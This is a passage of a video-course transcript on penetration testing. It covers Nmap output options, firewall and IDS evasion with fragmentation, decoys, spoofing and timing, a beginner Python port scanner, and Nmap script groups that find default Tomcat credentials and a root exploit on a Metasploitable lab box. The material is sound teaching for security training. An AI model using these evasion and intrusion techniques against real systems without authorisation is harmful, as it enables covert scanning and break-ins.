scanned top 100 ports. Now this doesn't mean that it scanned port from 1 to 100, this simply means it scanned first 100 ports that are usually most used. So we got 21, 22, 25, 53, and a bunch of others as well. But whenever you really want to find out everything you can about the target, this scan will be more useful. The one where we scan 65,000 ports, since you can see there are a lot more ports that are open than with this scan. Okay, cool. Let me show you one more option before we proceed to the next video. And that option is how to output an Nmap scan. So there are a few ways that we can do that. If I run Nmap and then we use the scene scan, which we covered, and let's say we scan the Metasploitable, there are 2 ways that we can do this. If we want the output to be inside of a file, we can use 2 arrows to the right and then output of scan.txt. Let me see, you requested the scan type which requires root privileges, so let us run it with root. And press enter, type in password, and you will see we get no output to our terminal. That is because all of the output is stored in this file. If we use the cat command to output the results, here is our scan that is being stored inside of this file. So this is useful once you want to, for example, add this to your report, so you just save it in a file and then later on copy and paste this on a report. Another way that you can do this, in case you want the results to be saved both in a file and also outputted in your terminal, we can use the -on option. So -on, I'm not sure if it is with capital N or lowercase n. We're going to check that out with the help menu. So let's go to the output settings, and it is -on option. And we can see right here -on option is output scan in normal. So we can simply just save this in a normal file. If you want some other file type, you can use OX for the XML. And we got some other options here as well that you might find interesting. For now on, we're just going to check out this one. So if I go down here and type nmap -on and then -ss, of course we need to run this with sudo. And we specify 192.168.1.5. Output file begins with, we need to specify the name of the file that we want to save it, so let's just call it output. And here it is, we get the output to our terminal, but if I also type ls and cat the output file, we also get the results saved inside of this file. Okay, great. These are just some of the basic options that I wanted to mention, since you might find them useful. And by now, as I already told you, you can consider yourself an intermediate Nmap scanner. Now to take this to the advanced level, we're going to check out in the next few videos how we can bypass firewall, IDS and IPS using Nmap scans. In this small section, we're going to cover how we can use Nmap in our advantage to be able to bypass some of the security measures that the target might have, such as firewalls and IDS. These options that we will use in Nmap can be considered advanced, so don't worry if you don't fully understand everything that we talked about in next few videos. Just make sure that in case there is something that you didn't understand, rewatch a video a few times and you will get it. But wait, Alexa, I don't even know what firewall or IDS is. So what are they? Well, firewall is a network security system that monitors network traffic, and it is based on the security rules that are predetermined. There are two types of firewalls: network firewalls and host-based firewalls. Network firewalls filter traffic between two or more networks, while host-based firewalls only filter traffic that is going in or out from that specific machine. And what IDS is intrusion detection system. It is usually a software application that monitors the network for any malicious activity. For example, some of the Nmap scans that we did in the previous section can get caught by intrusion detection system. So in this section, we will check out a few options that could help us bypass that. All in all, firewall and IDS helps us secure our network or machine. In the previous section, where we covered Nmap basics, we used our Kali Linux machine and we scanned our metasploitable target. We scanned different ports, and with the scans that we did, we managed to figure out what ports are open and what ports are closed. But some of our targets might host services on ports hiding behind the firewall. And once we scan them, it will tell us those ports are filtered, which we know that it means Nmap can't figure out whether that port is open or closed. What this means is that we're sending packets to that target, but their firewall keeps dropping those packets. And in this section, we're going to see what Nmap options can help us in bypassing this. Let's get straight into it. Let us talk about different options we can use in our scans to bypass firewall. Firewall is something unpredictable. You don't really know its rules in order to know exactly what type of scan you need to perform in order to bypass it. Some of the firewalls could use MAC address filtering in order to allow certain devices to connect to a specific port, or in order to block a certain devices. Some firewalls could block different types of packets. Some firewalls could block only some ports and not all of them, and we can't really know what the exact rule is. What I'm going to do is I will give you a few different options as to what you can try in order to bypass firewall. First of all, how can we know if some of the ports on target machine are behind a firewall? We already mentioned this in the previous video. Nmap will tell us that those ports are filtered. By now, we should already know what filtered port is, but let us define it once again. Filtered port is when Nmap can't figure out whether a certain port is open or closed, and that is due to it dropping packets, possibly because that port is behind a firewall. Therefore, we don't get any responses back from that port, and Nmap flags it as filtered. Let me show you this on a Windows machine. Right here, I have Windows 7 virtual machine, and this virtual machine, if I go to the control panel, and then System and Security, and Windows Firewall, this machine has firewall turned on. If I try to scan it using synscan, which we covered in the previous section, so let's do it right here. Remember, it requires sudo privileges, so sudo nmap-ss, and then the IP address. I will use the IP address of my Windows 7 virtual machine. And if I press here enter, type in the password, in just a few seconds the scan will finish. And we're going to compare this result when the firewall is turned on with the result once we turn off the firewall. So let's wait for this to end. And here it is. It doesn't have any port open. Matter of fact, it will tell me all 1000 scanned ports on this PC are filtered. Now, this doesn't mean that all could be closed or all could be opened. This just means that they are behind the firewall, and any packets we send get dropped by that firewall. So our target could have a few ports open and other closed, but we don't really know that. Let me show you the response of the same scan once we have that target turn off their firewall. So let's go to Windows machine, and I will click on this turn Windows firewall on or off. And in both of these settings, I will select turn off Windows firewall. Click on OK. And now, once the firewall is turned off, let us perform the same scan that we did right here. So we'll just use upper arrow, run the same command, and here it is. We can see that some ports are indeed open. This firewall right here doesn't have any special rules since it is made to block all traffics, so techniques that I'm about to show you in these few videos will not work on regular machines that just turn on their firewall and that don't accept any type of connection. However, once firewall rules are applied, and they usually are applied in some servers or machines that need remote access or that need to communicate with other machines, then we can test these options and see whether those rules have any vulnerability that we can bypass. I will turn the firewall back on, right here. I will close this, and let's start with our first option. We're going to use an option -f. So if I clear the screen and type the command sudo nmap-f and then the IP address, this -f option causes the requested scan to use tiny fragmented IP packets. Now you might be wondering, why would we do that? Well, the idea behind this is to split TCP header over several packets to make it harder for packet filters or intrusion detection systems to detect what you're doing. If we specify the option once, just by adding one -f, the Nmap will split the packets into 8 bytes or less. So if your packet had a 24 bytes TCP header, this would be split into 3 different packets of 8 bytes. Now, you can also specify the option twice with -f and then once again -f, and this will split the packets into 16 bytes per fragment. But be careful once running this option on an actual target, as some programs have trouble handling these tiny packets. If you want to increase fragment size even more, you can use the option --mtu, and after it the fragment size. Just remember that offset you specify must be a multiple of 8. This fragmentation won't always work. If I run this scan, this option will not work most of the time actually. It only works if a network that you're scanning can afford the hit that this will cause. Therefore, they just leave it disabled. Some networks also can't enable this because fragments may take different routes into their networks. Nonetheless, it is good to mention this option, as it might come in handy one day. Another option we can use, which is more focused on hiding your IP address than bypassing security, and that option is creating decoys using -d. So if I specify dash and then capital D, creating this decoy scan makes it appear to the target as it has been scanned not only by you, but also by the decoys that you specify. So their intrusion detection system might report multiple IP addresses that scan them, including yours. But they will not be able to determine which one is real. So you successfully hid your IP address from them. There are two ways that we can do this. And just to show you how this works, what I'm going to do is I will open a software called Wireshark on my Windows 10 machine. And with this software, we will be able to see which IP addresses are communicating with my Windows 10 machine. Now, you don't need to have Wireshark for now, just pay attention to the scans that we perform and results that we get in Wireshark. Right here, I will select Ethernet, since that is what I'm currently using, and we should already see some packets coming in. But these packets right here have nothing to do with our scan. So if I go back to my Kali Linux, and I run the command sudo nmap-d, and to specify how many random IP addresses we want to use to scan the target, we can specify -d and then rnd, 2 dots, and then the number of IP addresses we want to use. So in this case, I will use 5 random IP addresses. If I press enter right here and go to my Wireshark, it doesn't seem to be flooding anything. Are we successfully scanning? Oh, that's right, we are scanning Windows 7 machine, my bad, so we need to be scanning our Windows 10 machine, so let me check the IP address of my Windows 10. ipconfig 192.168.1.7, and right here I will just change from 16 to 17. And let's go back to Wireshark once again. It doesn't seem to show for some reason. Let us try adding this command, and we will use the synscan to perform this. Press enter. And the reason this might not work is because sometimes Wireshark will have a problem capturing the packets that we send from a virtual machine. And that is mostly because we're scanning our host machine from the virtual machine. So what I'm going to do is I'm going to go to my laptop and run the same command. Give me just a second, and I'm running the same command that we ran right here. I just ran it, and if I go back here we can see now the output. We can see that our Windows 10 machine is getting flooded with random IP addresses. If I stop it, I can see different IP addresses right here. So we got 193.245.213.77. We also got the other IP addresses, but I will also see my laptop's IP address, and it kind of sticks out. Since this RND option that we used creates random IP addresses, all of those random IP addresses will be truly random, while the only IP address that will stick out will be this 192.168.1.10, and that is a local IP. So this will most likely not work. They will recognize it as the true IP. So how can we change this and make it seem like the scan is coming from 5 local IP addresses that belong to my home network? Instead of running the command like this, what we can do is we can run the command like this, so sudo nmap and then -d, and after -d we specify 5 different IP addresses including ours. So we'll specify 192.168.1.2. Let's also use 192.168.1.5 for example. Let's use 192.168.1.6. Let's use 192.168.1.15. And let's at the end use my IP address. And to specify the Kali Linux IP address, we can simply type me. What this command will do is it will use these random IP addresses to scan the target, including our true IP address. So all we need to specify is the IP address of my Windows 10 machine. And if I run this, go back to Wireshark. Yeah, of course, once again, I must run this from the actual laptop in order for this to work. So what I'm going to do is I'm going to run the same command in just a second. And I'm running it right now. If I go to my Wireshark, here we can see now it is getting flooded with local IP addresses. We can see 192.168.1.2, .1.5, .1.15, and .1.10. And they will never really realize that this one is the correct IP address, since they're getting flooded with a lot of them. And you can change this number, you can use more IP addresses if you want, or less. But the point of this is that in case you're scanning a target that is inside the same network as you, use local IP addresses. And in case you're scanning the target that is outside your network, you can use this option right here, which will generate random IP addresses. And the security will have a hard time figuring out which one is the correct one. Cool, right? Now, don't worry, since this didn't work on my Windows 10 machine. The only reason it didn't work is because my Kali Linux machine uses the same network interface as my Windows 10 host machine. If you were to scan any other target except your host machine, this would work in every case. So for now, we looked at these two options, and in the next video, I will just quickly mention a few more options used to evade security, and then we will proceed to vulnerability analysis, which is the last step before we start gaining access to our target. We mentioned fragmented packets and creating decoys in the previous video. Right now, we're going to mention a few more options, and even though they are not that important, it is good to know they exist, so let's go through them real fast. I will not be running these options, but you can test them out if you want. I will just mention them so you know what else you can use. The first thing we got is option -s. And you run it like this, sudo nmap -s, and this option is used to spoof your IP address. It will make your target think that someone else is scanning them. The problem with this is that you will not get results of scan back, since they will be sent to the IP address that you're trying to impersonate. So for example, you can be trying to impersonate 8.8.8.8, and your target will be scanned with this IP address, or at least it will seem that the scan is coming from this IP address. For this option to work, you must also specify -pn, and the reason why you must specify -pn is, first of all, -pn is used to assume that all hosts are online, so it doesn't perform the ping scan to discover whether a host is up and running. Without the -pn, this option would not work, and the reason is because your target will be scanned with this IP address. And we will not be able to get the packets back and see whether the target is on or off. That's why we will just assume that the target is online, so we can scan them with a different IP address. Otherwise, we will never get the result whether they are online. And sometimes with these two options, you must also run -e. E is used to specify a network interface. So you would simply just type ifconfig, check out what network interface you're using, and you would specify it right here. In my case, that would be ETH0. Another cool option besides this that nmap has is you can specify the source port with -g option. This can sometimes help bypass a firewall. For example, a network administrator may set up a firewall and set a rule where only traffic from a certain port is allowed. And with that, he's probably thinking that attackers won't be able to figure out from which port exactly. And if you perform a scan and send packets from the port that's allowed in the firewall rule, you successfully bypassed firewall. So you would specify it with -g and then random port number. And one last thing that we will mention that could help you in bypassing firewall is changing different scan types. We already covered some scan types, and any of them could be useful to you sometimes. For example, in case you perform a SYN scan on a target machine, and in case the SYN scan is blocked by the target's firewall, which would mean that they drop all SYN requests that try to initiate TCP connection, we could try to perform a FIN scan, and FIN scan is labeled like this, -sf. Now, you're probably confused because there are a lot of scans that we can do. And in case you don't have any networking background, you're probably wondering what FinScan even means. Well, FinScan is just sending a fin packet without any other flags. And these SYN flags and fin flags can be confusing sometimes, but with practice you will catch everything up. Just one advice I have is that every time you don't fully understand something, just Google it. That is how I learned as well. And all of these options that we covered can be combined with something called timing template. And to show you what timing template really is, I opened up my Nmap manual right here, and I scrolled to this option right here, which says -T, timing template. And if you also open up Nmap manual, this will be all the way down. So there are about 1 or 2 minutes of scrolling until you reach this option. Here in the Nmap manual, we can see the -T comes with 6 different options or 6 different modes. And what's interesting for us regarding security evasion are the first 2 modes, which are 0 and 1, also called paranoid and sneaky. These 2 are used for IDS evasion, as it says right here. Now, the problem with T0 and T1, or the first 2 options, is since they are trying to avoid IDS alerts, they will take a lot longer to finish. So once you're scanning more machines or more networks, this might not be the most reasonable approach to take, since this scan will take a lot of time with specifying -T0 or -T1. And all of this, including the options that we covered in the last video, will help you in security evasion and spoofing. What I would advise you to do is also read about other options as well that we didn't cover, just to see what else can you do. In the next video, big things are happening. We're going to create our first tool used for penetration testing. Let's do it. Welcome back. We're about to start our first coding project. Are you ready to create your own first tool for hacking? We're going to create our tool using Python 3. And since Python is out of scope for this course, I won't be explaining Python basics. However, I will give my best to explain what we are exactly doing inside of our code for anyone that hasn't programmed before. Now, I know what you're thinking, programming is not needed for hacking. That is true. However, learning programming will help you understand how different tools work in greater details, and it will also allow you to create and weaponize your own tools that you can use. My advice for anyone that is learning ethical hacking and penetration testing is to, at some point of your journey, learn a programming language. Since if you're only using tools that other people create, you're limited to their tools. Now, these programming projects you can watch as we go through the course, or you can skip it until you finish entire course and then get back to them. It is completely up to you. Nonetheless, let's get straight into creating our first tool. Here we are in our Cal Linux. So how are we going to approach this? Well, for some of you that already have programming experience and already know Python, feel free to code this program wherever you want. You can code it on your host machine, you can code it in your Cal Linux machine, whatever you feel the best. You can also use any editor you want. But for you that haven't programmed before and have no idea what I'm talking about, what we're going to do is we're going to open our terminal. And inside of our desktop directory, we're going to create a directory called tools. Now you will notice we got it right here on the screen. And if I change the directory to that directory, right here we will create our program. And we're going to put our code inside of a Nano editor. Now we are already familiar as to how we can use Nano. So to open a file, we want to type Nano and then the file name. In our case, we are creating a Python program, so it needs to have extension.py. And since we just finished our scanning section, we will be creating a port scanner. It will not be an advanced port scanner like Nmap, but we're going to see how we can create a simple one just so you better understand how scanning of ports work. So let's type nano and then portscanner.py, and this will automatically open up our file. Here we're going to type in our code. The reason why we are not using anything else to type in our code is because Nano editor is really simple and easy to use. First thing that we're going to do is we're going to import the libraries that we're going to need for this project. The first library is called socket library, and we import them like this. This import command just loads this library. And we need this library to be able to communicate with other machines using TCP and UDP protocols. And another library that we're going to use is called termcolor library. And we're only going to need this library in order to print some statements in different colors. So nothing else besides that. Let us create the base of our program. So the first thing we need to do, whenever we are creating some type of a connection over TCP or UDP, we need to initiate a socket object. And socket objects are also called socket descriptors, and they are used for internet communication. To initiate a socket object in Python, we can call that object sock, for example, and to initiate it we type equals and then socket.socket. So what we're basically doing right here is we're calling this library and calling the socket function from that library. This will initiate the socket object for us and it will be stored right here. And all we're left to do, since Python is an easy programming language, is we need to connect to our target and our port. And for that we're going to use our socket object and the connect function onto our socket object. This connect function requires two different parameters that we specify between two open and two closed brackets. And those parameters are IP address and also port. But these are something that we have not defined yet. Our program does not know what an IP address is or what the port is. So what I'm going to do is I will create a function right here, and to initiate the function I just type def and then the function name. This function name will be called scanPort, and it will take two parameters which will be these two parameters. So let's copy them and let's paste them right here. These are going to be the two parameters that our function will take. And these two lines of code will belong to our function. In order to make them belong, you just tab once both of these lines and they will belong to this scanPort function. Now that we try to connect, there is logically one thing that we need to do. This connect function will either succeed, so we will manage to connect to a port, or it will not succeed. We won't be able to connect to that port. So these are two different options. Once we manage to connect, that means that the port is open, and if we don't manage to connect, that means that the port is closed. And what we are going to do to figure out whether a certain port is closed or opened, we're going to use try and except statement. And to specify try and except statement, we can do something like this. In the first line of our function, we type try, and then we tab these two lines to belong to the try statement. And down here, we also add except. Make sure to add two dots at the end. And what this simply means is that inside of our function, it will try to initiate the socket object, and then it will try to connect onto a certain port, on a certain IP address that we will specify later. If it manages to do that, then we can print something like print port opened. We can specify something like this. If it doesn't manage to connect, then it will proceed to this except statement, and then we can print port closed. Alright? So simple as that. Now there are a few things that are wrong with this function. First of all, we are just printing port opened. So once we try to connect to a port, we will not know which port is open, which port is closed, since we didn't specify a number. To specify exactly which port is open, what I'm going to do is type port opened, and then plus, and then I can specify string of port. And remember, port is our parameter for our function. And what this string function does is it converts the port, which is an integer number most likely, to be a string. So it can print it out using this print statement. What I'm going to do also is add space right here so we print this more nicely. And right here I will add the plus sign, which means that we successfully discovered an open port. And down here we're going to do the same thing, so we're going to print minus sign, which means port is closed, and then we're going to add plus the string of port. Another thing we will do in case we find out an open port is we can close the socket object. Since we successfully completed an action, we found an open port, we can close the socket object. Okay, so this is our base function. For now on, we're going to leave it like this. But there are a few more things that we need to specify. First of all, we want to prompt to the user of this program what IP address or what target they want to scan. So outside of this function, we can create a variable called target or targets, whatever you like. And that variable will be equal to input. And this input function allows the user of the program, once they run the program, to input any string that they want. And here we will specify to them that we need a target. So enter target to scan. Once they enter a target, we can also ask them for port to scan. Now trust me, I know what you're thinking right here. This is too simple. We're only scanning one port on a target. So we don't really want to do that. We want to specify right here ports. So this will be enter how many ports you want to scan. So they can scan 100 ports or 1000 ports or all 65,000 ports if they like. But how are we going to change that inside of our code? Well, we're not going to touch this at all. What we're going to do is we'll create another function called scan. But this just starts the same. This one doesn't have the port inside of the name. And this scan function will take two arguments as well. And those arguments are going to be the targets and the ports. And all we are going to do right here is we're going to iterate, so for port in range from 1 to ports, for each and every port, we're going to call scan port function. And this scan port function, remember, takes two arguments, and those two arguments are going to be targets and port. And let me explain this a little bit better. What these two lines do is this will iterate from 1 to any number that they specified right here inside of this line. And then it will call for each and every number the scan port function. So it will start from 1 and then it will scan port number 1 using this function. Then it will increase port to be 2 and then it will call scan port function once again once the port is equal to 2. And it will do that until it reaches the port's number that the user of the program specified right here. But what if our user wants to specify multiple targets? What then? They, for example, don't want to scan only one target, they want to scan two targets. That's why what we're going to do is we're going to change this scan function, and this scan function will take target as an input and it will scan the port on target. But notice this target is something that we don't really have. If we call right here scan target and then ports, we have targets, but we do not have target. And we're going to change this targets variable to be enter targets to scan. And inside of the brackets, we will explain to them, split them by comma. So they can specify, for example, two targets. They can specify them like this. They want to scan 192.168.1.1, comma, 192.168.1.5. For example, if they specify it like this, then we have a problem. We will call the scan function on one target, but we need to split this input so it scans this IP address and then after it, it scans this IP address. Let's see how we can do that. For now, down here, what we're going to do is we're going to check if there is comma inside of our targets variable. If, and to specify that, we open single quote, type comma and close single quote. If comma is in targets, this means that they specified multiple targets. So what we're going to do is we're going to go down a little bit and then print, and then open double quotes. We can specify this star sign just so it looks a little bit better. Scanning multiple targets. And let's close the double quotes. And then right here what we can do is, instead of calling the scan function outside of the if statement, we're going to call it inside of the if statement. And what we're going to do is we're going to use a for loop inside of this if statement. So for IP address, and we're going to call it IPADDR, in targets dot split, and this split function simply splits the input that the user specified by any sign that we specify in between these single quotes. Now, since the users of this program will specify targets with comma, we also want to split the input with comma. That way, we're going to get with two IP addresses that don't have this comma in between them. And for each IP address in this targets variable, we're going to scan IP address, and let us strip it out of any empty spaces. And we do that by typing strip, open the brackets, single quote, space, single quote. And the second parameter we will leave to be ports. In any other case, in case they specified only one target, we're going to use else statement. And in that case, we're simply just going to scan targets and then ports. So we're just pasting the entire input of this variable inside of the scan function. And that is because they only inputted one IP address, because there is no comma inside of this variable. So let's go through this real fast, just to figure out everything a little bit better. Let's go from the beginning of the program, which is down here. So we ask the user for the targets. They can specify either one target to scan or multiple targets to scan, separated by comma. Then they specify the ports that they want to scan, and by specifying ports I mean the amount of ports that they want to scan. So if they type 500 right here, our program will scan first 500 ports. Once we take these two variables and we take the input from the user, we check whether comma is inside of this targets variable. If it is, that means multiple targets have been specified. Then we go for each IP address inside of this targets variable, and we check out those IP addresses by splitting the input with comma. Then we will scan each and every IP address with the specified amount of ports. In case they only specified one IP address, then we scan that one IP address with the specified amount of ports. Once we go to the scan function, this will go for port in range 1 to the amount of ports specified, and it will perform the scan port function for each and every port. If we manage to connect, we will print port is opened. If we don't manage to connect, we will print port is closed. Let's see whether this works. If I Ctrl O, then enter, and Ctrl X to exit. To run this program, I can use Python 3 and then portscanner.py. It asks us enter targets to scan, split them by comma, and what I'm going to do, I'm going to scan my router. What you can do, you can open and start your Metasploitable, and I'm going to start it right now as well, just so we can test later the multiple target scan. And I'm going to type the IP address of my router, which is this one. Press enter, enter how many ports you want to scan. Let's say I want to scan first 100 ports. And we get our first error. Now, don't worry, errors occur a lot in programming. Let's see what the error says. String object cannot be interpreted as integer, and it is inside of this line. Let's check it out. Let's go back to our program using nano, so nano portscanner.py, and let's see where the error is. It seems to be right here. So we are pasting this ports option as an integer, but we are taking an input as a string. So what we can do is we can wrap this ports input inside of the integer function, which will convert this number into an integer. Let's try and see whether this fixed the problem. If I type it once again, 192.168.1.1, and then ports 100. Wow, this finished really fast. And we can see it scanned 100 ports. It managed to find these two that are open, and this one as well. Let me just find it. And this one as well. Now, I know what you're thinking. This is a terrible output. We can barely see which ones are open and which ones are closed. So what we can do to fix this, we can go back to our program, and in the except part where we print that the port is closed, we are not going to print anything. We're just going to pass. This pass simply means do nothing and continue with the execution of the program. Why we do this? Well, we don't really care which ports are closed. We only want to print the ports that are open. So let's see whether this fixed our program. If I type Python 3 port scanner and I run the same IP address, which is my router, first 100 ports, there it is. We get a whole lot better output. We only get ports that are open. Let's test this program on two different targets. So I started my Metasploitable, and what I'm going to do is log in, check the IP address of a Metasploitable, which is 192.168.1.5, and if I run the program once again and type 192.168.1.1, which is my router, and then comma 192.168.1.5, press enter, enter amount of ports, let's say we want to scan 100 ports, and this will work, but it gives us the wrong output. We don't know which ports belong to which target. So let's go back to our program and see how we can fix this. To fix this, we're going to add a print statement inside of our scan function. Right at the beginning, we're going to print. First, we're going to start with a new line character, and the new line character is \n. Close the single quote, plus, and let's open single quote once again, enter space, and then type starting scan for, another space, and then single quote, plus the string of the target. And remember, target is our argument to our function, and this target is an actual IP address that we split right here. Here we paste this IP address inside of the scan function, and this ipaddr.strip is the same thing as this target right here. So if I print it like this and close two brackets because we have one bracket opened right here, let's test it out once again. Control O to save, Control X to exit, and let me run the program once again. First 100 ports. This is a lot better. We get which ports are open for my router, and we also get which ports are open for my Metasploitable. Now, with this, our program is basically finished. What you can do to make this better is you can change the output a little bit. So right here where you print scanning multiple targets, we can use the term color library that we imported, and from that term color library we can take the colored function. And this function just changes the color of our print statement into any color that we want. So what we need to do is inside of the print statement type term color.colored, open bracket, type the statement that you want to print, close one bracket, type comma, and then open single quote, and let's say we want to print this in green. And then I need to close two more brackets, one for the colored function and one for the print function. Let's see whether this will work. Control O to save once again, and Control X to exit. Python 3 port scanner.py. Unmatched bracket. So let's check it out. Yeah, we do got one bracket more. Let us go back and remove it. So we got print bracket closed right here, and we got the colored bracket closed right here. So yeah, this one right here is one too extra. Let's delete it. Save it once again. Run the program. Type any two targets that you want to scan. In my case, I am using router and Metasploitable. And I want to scan, let's say this time I want to scan first 200 ports. Now, it doesn't seem to print it in green for some reason. Let's see what the problem is. if I go all the way down to our print statement, right here it seems that our colored function only took this as an argument. And we want it to take this as well. So what we need to do, we first of all need to delete this. What we need to do is open another bracket right here and close another bracket right here. Now this does seem confusing with all of these brackets being open and closed, but what we just did is we extracted this statement to be one function. So inside of the colored, we open one bracket for the function itself, then we paste two arguments and we split these arguments like this. And first argument is this print statement, while the second argument is the color that we want to print it in. Hopefully right now this will work. And if I go and run the program once again and scan first 200 ports, now it seems to work. It says scanning multiple targets and it is printed in green. As we can see for our Metasploitable, we also found 2 more additional ports because we increased the number to 200. Cool. Now you got your first tool ready to use in your penetration tests. Now, even though this is a simple port scanner, you can do many things to make it a little bit better. If you are an experienced programmer, what you can do, you can try to receive a banner from these open ports. So you can try to send packets and receive packets and store the response inside a variable and then print it out to see what banner does an open port have. And banner is just something that an open port might send as an information as to which software it is running on that open port. And from that banner, we can also extract the version of that software. But we're not going to be doing that right now because that would be a little bit too advanced for us. Right now we are happy with this program. In the next few videos, we're going to be covering vulnerability analysis. See you there. Welcome to the vulnerability analysis section. So we covered scanning and we managed to discover a bunch of information about our target. And right now we're going to use that information to discover whether a target has some vulnerabilities. We're going to cover 3 different tools in this section. And the first one is going to be an already familiar tool, which is called Nmap. We're going to tackle a subject on Nmap scripting. By now, we learned that Nmap is used for scanning targets. But Nmap can also perform vulnerability analysis, and in some cases it can even perform exploitation with the help of different scripts. As this is advanced use of Nmap, we should first explain what are these Nmap scripts. Well, Nmap scripts are commonly used in scanning to detect different service vulnerabilities. It can also be used for brute forcing attacks. It can be used to detect a malware on target machine. It is also used to collect even more information about databases and other network services. So we can consider this lecture to be half scanning and half vulnerability analysis. The goal of this lecture, however, will not be the vulnerability analysis, but to show you how we can run these scripts. And before we even run them, we need to know what are our available options. So, where are those scripts? How do we run them? How do we know which scripts even exist? Inside of the Kali Linux, we can find all the scripts that Nmap has inside of this directory. So, open up your terminal and navigate to user share /nmap and then /scripts. If I type ls right here, we can see there are a lot of them. Let us test some of them out and see whether they give us any information about our target. Now, running scripts comes with 2 different options. We can either specify one script to use in a scan, or we can specify a group of scripts that we will use inside of a scan. And to fully understand all the possible things that we can do with scripts using Nmap, you should take a look at this page right here. This is the official Nmap page from the nmap.org link, and in the /book/nseusage.html, it will give us a good explanation about script groups and the usage of Nmap. If I scroll all the way down, here is the usage and examples. We get different script categories, which are script groups. We can see right here that the currently defined categories are auth, broadcast, brute, default, discovery, and many more right here. And down here we can read about each and every one of them to see what each script group does. So for example, right here, the brute script group, it says these scripts are used to brute force attacks to guess authentication credentials of a remote server. Nmap contains scripts for brute forcing dozens of protocols, including HTTP brute, Oracle brute, SNMP brute, and so on and so on. Let us test some of them out. Let us start with this auth script group first. We can read these scripts deal with authentication credentials or bypassing them on the target system. Examples include X11 access, FTP anonymous, and Oracle enum users. Now these right here that you read are single script names, and these single scripts belong to this larger script group. Right here it also says scripts which use brute force attacks to determine credentials are placed in the brute category instead. So right here there are no scripts that are used for brute forcing. And what brute forcing simply means is running a bunch of usernames and passwords onto the target system to discover which one is the correct username and which one is the correct password. But more about brute forcing later on. For now, let us go and test some of these scripts. To run a scan with the script group, we can use nmap --script, and after it we specify the script group. So in my case I will use auth, and I will scan my metasploitable machine with the synscan. Remember, synscan requires sudo privileges, so let's add sudo and type in our password. As soon as it finishes, we're going to see whether this auth script group discovered any useful information for us regarding vulnerabilities. Okay, so it has finished. Let us see whether our script managed to detect anything unusual. So we get the standard output of all the open ports, and we also get some other information for some of the ports. For example, right here we get FTP anon, and this FTP anon is just a single script name from the nmap. It tells us that anonymous FTP login is allowed. What does this mean? Well, this is something that we will cover later. For now on, just keep in mind that anonymous login is allowed for the port 21. Under the SSH port, we get which authentication methods are supported, right here. Down here we get information for the SQL port. It tells us that root account has empty password. This can also be very useful for us. And right here we can see Tomcat, Tomcat. What does this mean? Well, this looks like a default Tomcat credentials. And if I go down here, it tells us post-scan script results. It says that this is a valid credential for Tomcat. It is for the service running on this port. Let us check this out. This might be the first vulnerability that we find. To check whether this is correct, we can go and open up Firefox. And we're going to make a connection to our Metasploitable on this port right here. So just find out the IP address of your Metasploitable, and if you scanned it right now, you already know it. So for me, it is 192.168.1.6. And to make a connection to a port, I will type 2 dots and then the port number. In my case, what seems to be a vulnerability is found on this port. So let's copy the port, and I will paste it right here. Oops. It seems that it only pasted the port. Let me just retype this and type the port like this. So 8180, and then visit this. And here we get the official Apache Tomcat page. Let's see whether we can find something interesting right here. And what we're looking for based on these credentials is a login screen. So this Tomcat administration seems interesting. If I click on it, it leads us to this admin page where we are required to specify username and password. And down here from our scan, we got Tomcat and Tomcat. Let's try it out and see whether it fits. If I type Tomcat for the username and Tomcat for the password, click on login, there it is. We managed to log in to the admin page of the Tomcat server. Great! This is our first vulnerability that we managed to discover and exploit. We are now in the administrator page of the Tomcat. Now, there are other things that we can do right here as well, but for now, we're just happy that we managed to gain access to the administrator page. Down here we have user databases, mail sessions, data sources, and these are all empty because this is a test machine. But if it was a real machine, this would probably all be filled with some other useful information. Great, let's leave this on side for now. So we managed to gain access to the Tomcat administrator page with the help of Nmap script. Let's see what else we can do with scripts. So let's go and try out the malware scan. These scripts test whether the target platform is infected by malware or backdoors. Let's see whether our target is infected with malware. We can run the same command, just this time instead of auth, we're going to use malware. Let's run the scan. And let me Control-C this just so we can make this faster. I'm going to use the -F option to scan only 100 ports and not 1000 ports. And it doesn't seem to find any malware right here. But what you can do with this scan, you can wait for us to first exploit the Metasploitable in the next section, and then test this scan once again to see whether you can notice any backdoors that we uploaded that are making connection to our Kali Linux machine. For now, it doesn't seem to give us any result for the first 100 ports. Let's try another scan. We're going to use right now the banner script group. And what banners are simply what the open port will give us as the information once we connect to it. Banners usually hold information disclosure, and by information disclosure they can give us the exact version of the software running on an open port. And we can see the scan has finished, and we get the banner, which holds the version for the FTP. We get the banner for the SSH that also holds the version, and this is something similar for the version scan that we covered in Nmap. Now, sometimes banner will look something like this, and this is something that we cannot read. But I will show you in the exploitation section that this telnet port is one of the easiest ports to exploit and gain access to Metasploitable. And we're going to do this over banner. For now, it seems that we cannot even read this banner, but later we're going to use the exact same banner for telnet to gain access to the Metasploitable. Let's check out another scan. Let's try this scan group, and this scan group is called exploit. And while it runs, if I go right here and try to find that scan group, it tells us that the scripts that belong to this exploit scan group aim to actively exploit some vulnerability. Here are some of the examples of the script names that belong to the group. So this script group will actually try to exploit if it finds a vulnerability. Let's see whether it finished, and it did finish. Right here we can see port 80. Spidering limited to this found the following possible CSRF vulnerabilities. So here are the possible vulnerabilities that it found for this specific vulnerability. And from now on, don't worry about this type of vulnerabilities for the HTTP port we are going to cover in the website penetration testing section. For now, we're just taking a look at how we can discover them using vulnerability analysis. Let's go all the way up. And for the FTP port, it tells us right here that the port is vulnerable. It is running this version, and it seems that it managed to exploit it, as it says right here, vulnerable and exploitable. And right here we get the exploit results. The Nmap script ran this command, and it actually managed to get the root account on the target machine. So we found another vulnerability. Here is the FTP port that is exploitable. Now, we don't really know how to exploit it yet, but for now, with the help of scripts and vulnerability analysis, we know that this right here is exploitable. And in the exploitation section, we're going to see exactly how we can gain access and perform the same thing that the Nmap performed right here. Now, under these IDs, you will see this name right here. Now, get used to these type of names. This is how different vulnerabilities are labeled. This 2011 is a year when the vulnerability occurred. Okay, great. But these are just some of the script groups that we can run. Of course, we're not going to be running all of them in this video, since as you see right here, there is a lot of them. You can test them out and see what each and every one of them do. But for now, let us just see how we can run one script. We saw how we can run script groups, but sometimes you will only want to run a single script. And we already know that scripts are located inside of this directory, right here. And there is a lot of them. Let's go all the way up and try to find some cool script. This one seems interesting. Firewall bypass. And this .nse is just the extension for the scripts. And by the way, do not blindly run these scripts. What you can do to check out what exactly a certain script does is you can copy its name and then run the command sudo nmap --script -help and then the name of the script. So paste the script name and type enter. It will tell us that this particular script detects a vulnerability in NetFilter and other firewalls that use helpers to dynamically open ports for protocols such as FTP and SIP. Right here it also tells us how the script works. So the script works by spoofing a packet from the target server, asking for opening a related connection to a target port. And 